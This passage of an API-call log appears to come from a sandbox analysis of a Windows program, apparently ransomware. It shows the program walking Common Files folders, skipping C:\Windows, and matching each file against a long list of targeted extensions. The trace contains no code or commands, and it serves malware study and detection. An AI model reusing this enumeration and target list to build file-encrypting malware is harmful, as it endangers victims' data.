lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.464] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0035.464] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*", lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.464] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.464] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c600, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbca8c600, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOSVINT.DLL", cAlternateFileName="")) returned 1 [0035.464] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.464] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.464] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdd9f300, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbdd9f300, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xaf88, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOSV.DLL", cAlternateFileName="")) returned 1 [0035.464] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.464] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ee0058 | out: hHeap=0x570000) returned 1 [0035.464] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0035.464] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.464] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.465] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0035.465] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*", lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.465] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.465] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 1 [0035.465] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*", lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1300 [0035.465] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.465] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0035.465] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*", lpFindFileData=0x353eb9c | out: lpFindFileData=0x353eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1200 [0035.466] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353eb9c | out: lpFindFileData=0x353eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.466] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353eb9c | out: lpFindFileData=0x353eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870ca400, ftCreationTime.dwHighDateTime=0x1cac036, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x870ca400, ftLastWriteTime.dwHighDateTime=0x1cac036, nFileSizeHigh=0x0, nFileSizeLow=0x296a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPEXT.MSG", cAlternateFileName="")) returned 1 [0035.466] FindClose (in: hFindFile=0x3ef1200 | out: hFindFile=0x3ef1200) returned 1 [0035.466] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f8 | out: hHeap=0x570000) returned 1 [0035.466] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c366f00, ftCreationTime.dwHighDateTime=0x1cac0be, ftLastAccessTime.dwLowDateTime=0x6193ae30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c366f00, ftLastWriteTime.dwHighDateTime=0x1cac0be, nFileSizeHigh=0x0, nFileSizeLow=0x267d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPSRVUTL.DLL", cAlternateFileName="")) returned 1 [0035.466] FindClose (in: hFindFile=0x3ef1300 | out: hFindFile=0x3ef1300) returned 1 [0035.466] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fda4f0 | out: hHeap=0x570000) returned 1 [0035.466] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 0 [0035.466] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.467] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.467] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 0 [0035.467] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.467] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ee0058 | out: hHeap=0x570000) returned 1 [0035.467] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0035.467] FindClose (in: hFindFile=0x3ef1140 | out: hFindFile=0x3ef1140) returned 1 [0035.467] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ed0050 | out: hHeap=0x570000) returned 1 [0035.468] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0035.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services") returned 38 [0035.469] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Common Files\\Services") returned 1 [0035.469] lstrlenW (lpString="Services") returned 8 [0035.469] lstrcmpiW (lpString1="C:\\Windows", lpString2="Services") returned -1 [0035.469] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0035.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services") returned 38 [0035.469] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1140 [0035.469] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.469] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0035.469] lstrlenW (lpString="verisign.bmp") returned 12 [0035.469] lstrlenW (lpString=".1cd") returned 4 [0035.469] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0035.469] lstrlenW (lpString=".3ds") returned 4 [0035.469] lstrcmpiW (lpString1=".3ds", lpString2=".bmp") returned -1 [0035.469] lstrlenW (lpString=".3fr") returned 4 [0035.469] lstrcmpiW (lpString1=".3fr", lpString2=".bmp") returned -1 [0035.469] lstrlenW (lpString=".3g2") returned 4 [0035.469] lstrcmpiW (lpString1=".3g2", lpString2=".bmp") returned -1 [0035.469] lstrlenW (lpString=".3gp") returned 4 [0035.469] lstrcmpiW (lpString1=".3gp", lpString2=".bmp") returned -1 [0035.469] lstrlenW (lpString=".7z") returned 3 [0035.470] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0035.470] lstrlenW (lpString=".accda") returned 6 [0035.470] lstrcmpiW (lpString1=".accda", lpString2="gn.bmp") returned -1 [0035.470] lstrlenW (lpString=".accdb") returned 6 [0035.470] lstrcmpiW (lpString1=".accdb", lpString2="gn.bmp") returned -1 [0035.470] lstrlenW (lpString=".accdc") returned 6 [0035.470] lstrcmpiW (lpString1=".accdc", lpString2="gn.bmp") returned -1 [0035.470] lstrlenW (lpString=".accde") returned 6 [0035.470] lstrcmpiW (lpString1=".accde", lpString2="gn.bmp") returned -1 [0035.470] lstrlenW (lpString=".accdt") returned 6 [0035.470] lstrcmpiW (lpString1=".accdt", lpString2="gn.bmp") returned -1 [0035.470] lstrlenW (lpString=".accdw") returned 6 [0035.470] lstrcmpiW (lpString1=".accdw", lpString2="gn.bmp") returned -1 [0035.470] lstrlenW (lpString=".adb") returned 4 [0035.470] lstrcmpiW (lpString1=".adb", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".adp") returned 4 [0035.470] lstrcmpiW (lpString1=".adp", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".ai") returned 3 [0035.470] lstrcmpiW (lpString1=".ai", lpString2="bmp") returned -1 [0035.470] lstrlenW (lpString=".ai3") returned 4 [0035.470] lstrcmpiW (lpString1=".ai3", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".ai4") returned 4 [0035.470] lstrcmpiW (lpString1=".ai4", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".ai5") returned 4 [0035.470] lstrcmpiW (lpString1=".ai5", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".ai6") returned 4 [0035.470] lstrcmpiW (lpString1=".ai6", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".ai7") returned 4 [0035.470] lstrcmpiW (lpString1=".ai7", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".ai8") returned 4 [0035.470] lstrcmpiW (lpString1=".ai8", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".anim") returned 5 [0035.470] lstrcmpiW (lpString1=".anim", lpString2="n.bmp") returned -1 [0035.470] lstrlenW (lpString=".arw") returned 4 [0035.470] lstrcmpiW (lpString1=".arw", lpString2=".bmp") returned -1 [0035.470] lstrlenW (lpString=".as") returned 3 [0035.470] lstrcmpiW (lpString1=".as", lpString2="bmp") returned -1 [0035.471] lstrlenW (lpString=".asa") returned 4 [0035.471] lstrcmpiW (lpString1=".asa", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".asc") returned 4 [0035.471] lstrcmpiW (lpString1=".asc", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".ascx") returned 5 [0035.471] lstrcmpiW (lpString1=".ascx", lpString2="n.bmp") returned -1 [0035.471] lstrlenW (lpString=".asm") returned 4 [0035.471] lstrcmpiW (lpString1=".asm", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".asmx") returned 5 [0035.471] lstrcmpiW (lpString1=".asmx", lpString2="n.bmp") returned -1 [0035.471] lstrlenW (lpString=".asp") returned 4 [0035.471] lstrcmpiW (lpString1=".asp", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".aspx") returned 5 [0035.471] lstrcmpiW (lpString1=".aspx", lpString2="n.bmp") returned -1 [0035.471] lstrlenW (lpString=".asr") returned 4 [0035.471] lstrcmpiW (lpString1=".asr", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".asx") returned 4 [0035.471] lstrcmpiW (lpString1=".asx", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".avi") returned 4 [0035.471] lstrcmpiW (lpString1=".avi", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".avs") returned 4 [0035.471] lstrcmpiW (lpString1=".avs", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".backup") returned 7 [0035.471] lstrcmpiW (lpString1=".backup", lpString2="ign.bmp") returned -1 [0035.471] lstrlenW (lpString=".bak") returned 4 [0035.471] lstrcmpiW (lpString1=".bak", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".bay") returned 4 [0035.471] lstrcmpiW (lpString1=".bay", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".bd") returned 3 [0035.471] lstrcmpiW (lpString1=".bd", lpString2="bmp") returned -1 [0035.471] lstrlenW (lpString=".bin") returned 4 [0035.471] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0035.471] lstrlenW (lpString=".bmp") returned 4 [0035.471] lstrcmpiW (lpString1=".bmp", lpString2=".bmp") returned 0 [0035.471] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0035.471] FindClose (in: hFindFile=0x3ef1140 | out: hFindFile=0x3ef1140) returned 1 [0035.472] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.472] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0035.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines") returned 43 [0035.472] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Common Files\\SpeechEngines") returned 1 [0035.472] lstrlenW (lpString="SpeechEngines") returned 13 [0035.472] lstrcmpiW (lpString1="C:\\Windows", lpString2="SpeechEngines") returned -1 [0035.472] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0035.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines") returned 43 [0035.472] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\*", lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1140 [0035.472] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.472] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0035.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned 53 [0035.472] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned 1 [0035.472] lstrlenW (lpString="Microsoft") returned 9 [0035.472] lstrcmpiW (lpString1="C:\\Windows", lpString2="Microsoft") returned -1 [0035.472] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3ed0050 [0035.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned 53 [0035.473] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.473] FindNextFileW (in: 